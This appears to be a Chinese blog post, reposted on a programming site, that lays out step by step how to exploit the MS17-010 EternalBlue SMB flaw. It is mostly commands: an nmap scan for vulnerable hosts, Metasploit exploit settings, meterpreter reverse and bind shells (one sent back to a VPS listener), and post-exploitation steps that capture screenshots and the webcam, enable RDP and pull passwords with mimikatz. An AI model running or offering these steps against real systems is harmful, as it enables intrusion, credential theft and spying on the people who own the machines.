1. 全栈程序员必看首页

MS17010漏洞利用总结

全栈程序员-站长 未分类 阅读 93

MS17010漏洞利用总结0x01常规打法扫描是否存在ms17-010漏洞:nmap-n-p445–scriptsmb-vuln-ms17-010192.168.1.0/24–openMSF常规漏洞利用:msf>useexploit/windows/smb/ms17_010_eternalbluemsf>setrhost192.168.1.112反向打:msf>setpayloadwindows/x64/meterpreter/reverse_tcpm

大家好,又见面了,我是你们的朋友全栈君。

0x01 常规打法

扫描是否存在ms17-010漏洞

nmap -n -p445 --script smb-vuln-ms17-010 192.168.1.0/24 --open

MSF常规漏洞利用:

msf > use exploit/windows/smb/ms17_010_eternalblue 
msf > set rhost 192.168.1.112 
反向打:
msf > set payload windows/x64/meterpreter/reverse_tcp 
msf > set lhost 192.168.1.118
正向打:
msf > set payload windows/x64/meterpreter/bind_tcp

常用功能:

桌面抓图 
meterpreter > screenshot
视频开启 
meterpreter > webcam_scream
开启远程桌面 
meterpreter > run post/windows/manage/enable_rdp 
目标密码破解
第一步:载入mimikatz
meterpreter > load mimikatz
第二步:使用命令wdigest获取密码
meterpreter >wdigest

0x02 反弹到VPS稳定打法

(常规打不好使的情况下。)

1.环境
vps 140.x.x.x
目标 192.168.3.123
本地kali 192.168.3.62

2.vps开启监听。

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 443
exploit -j -z

在这里插入图片描述
3.kali下开始攻击。

use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.3.123
set payload windows/x64/meterpreter/reverse_tcp
set lhost 140.x.x.x  #反弹到vps
set lport 443

在这里插入图片描述
run到下图界面Ctrl+C
在这里插入图片描述
4.vps收到meterpreter。(如果不稳定就多打几次)
在这里插入图片描述

0x03 目标为Win2003情况下稳定打

方法一(命令执行)

msf5 > use auxiliary/admin/smb/ms17_010_command
msf5 > set command whoami
msf5 > set rhosts x.x.x.x

在这里插入图片描述
方法二(返回meterpreter)
在这里插入图片描述

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/131363.html原文链接:https://javaforall.net

(0)
0 0

关于作者

全栈程序员-站长的头像

全栈程序员-站长

133.5K 文章
3 粉丝
本网站汇聚当前互联网主流语音,持续更新,欢迎关注公众号“全栈程序员社区”
上一篇 2022年6月12日 下午2:36
下一篇 2022年6月12日 下午2:36


相关推荐

  • 彻底理解——指针常量和常量指针、指向常量的常指针

    彻底理解——指针常量和常量指针、指向常量的常指针

    彻底理解——指针常量和常量指针、指向常量的常指针前言 在汉语中 定语一般都放在中心词的前面 像 C 语言和 C 语言这种技术性语言 更是如此 所以定语重要还是中心词重要 肯定是中心词重要 如 美丽的女孩美丽的是定语女孩是中心词 女孩肯定是重要 是本质 同理 我们先不讲技术 先从字面意思来理解 指针常量 常量指针 函数指针 指针函数 数组指针 指针数组指针常量指针是定语 常量是中心词 所以指针常量本质是一个常量常量指针常量是定语 指针是中心词 所以常量指针本质是一个指针函数指针本质上是一个指针 那就

    全栈程序员-站长的头像 全栈程序员-站长
    2026年3月26日
    2
  • python merge函数[通俗易懂]

    python merge函数[通俗易懂]

    python merge函数[通俗易懂]本篇详细说明merge的应用,join和concatenate的拼接方法的与之相似。pd.merge(left,right,how=’inner’,on=None,left_on=None,right_on=None,left_index=False,right_index=False,sort=True,suffixes=(‘_x’,’_y’),copy=True,indicator=False,validate=No

    全栈程序员-站长的头像 全栈程序员-站长
    2022年5月2日
    81
  • 想发表文章在哪里发表_微信朋友圈怎么弄的置顶文字

    想发表文章在哪里发表_微信朋友圈怎么弄的置顶文字

    想发表文章在哪里发表_微信朋友圈怎么弄的置顶文字  因为博客中的文章已经越来越来了,为了便于文章检索,特整理本文,欢迎收藏!!!Java核心1.JDK8新特性Lambda表达式讲解接口新特性函数式接口方法引用Stream流Optional工具类介绍新的日期时间工具类介绍注解的增强2.Java核心Java集合核心内容之数组和链表Java集合核心内容之二叉树2-3-4树详解红黑树详解精讲红黑树删除操作剖析反射的本质3.设计模式3.1创建型模式  都是用来帮助我们创建对象的!模式地址单例模式ht

    全栈程序员-站长的头像 全栈程序员-站长
    2025年12月1日
    7
  • ArcGIS“一个或多个ActiveX控件无法显示…”问题的解决方案

    ArcGIS“一个或多个ActiveX控件无法显示…”问题的解决方案

    ArcGIS“一个或多个ActiveX控件无法显示…”问题的解决方案ArcMap 启动时的一个警告信息 一个或多个 ActiveX 控件无法显示 如图出现这种情况 有可能的原因是 IE 浏览器的安全选项设置被修改了 比如被手动修改过 或者被第三方系统杀毒优化软件修改了 解决办法如下 按图启用对应选项设置好后 保存设置 再启动 ArcMap 发现不会再提示该警告信息了 转载于 https www cnblogs com h

    全栈程序员-站长的头像 全栈程序员-站长
    2026年3月18日
    2
  • SIP 服务器

    SIP 服务器

    SIP 服务器所谓 SIP 服务器指的是接受 SIP 请求并对其作出响应的应用程序 SIP 服务器不应与 UAS 或协议本身的 client server 性质混淆 后者从客户端 请求发起方 和服务端 对请求生成应答一方 的操作角度进行描述 SIP 服务器是另一种类型的实例 这里讨论的 SIP 服务器是逻辑实体 实际的 SIP 服务器实现可以包含多种服务器类型 或者在不同条件下有不同操作充当不同的服务实体 因为服务器对 UA 提供服务和特性 所以它们必须同时支持 TCP 和 UDP 传输 下图显示了 UA 服务器和定位服务间的交互关系 注意 SI

    全栈程序员-站长的头像 全栈程序员-站长
    2026年3月20日
    2
  • IC验证培训——SystemVerilog通用程序库(下)

    IC验证培训——SystemVerilog通用程序库(下)

    IC验证培训——SystemVerilog通用程序库(下)路桑的个人网址:路科验证-IC验证培训-数字芯片验证五、类方法还是包函数?我们最初的直觉是将svlib作为一组SystemVerilog类呈现给用户。我们假设由一个类来表示一个正则表达式,另一个类来表示一个文件名,等等。从库写作者的角度来看,以这种方式打包用户数据是非常有吸引力的,因为它允许我们将任意隐藏数据与每个对象相关联。 我们在编写面向用户的API时,上遇到了一个严…

    全栈程序员-站长的头像 全栈程序员-站长
    2025年9月3日
    7

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号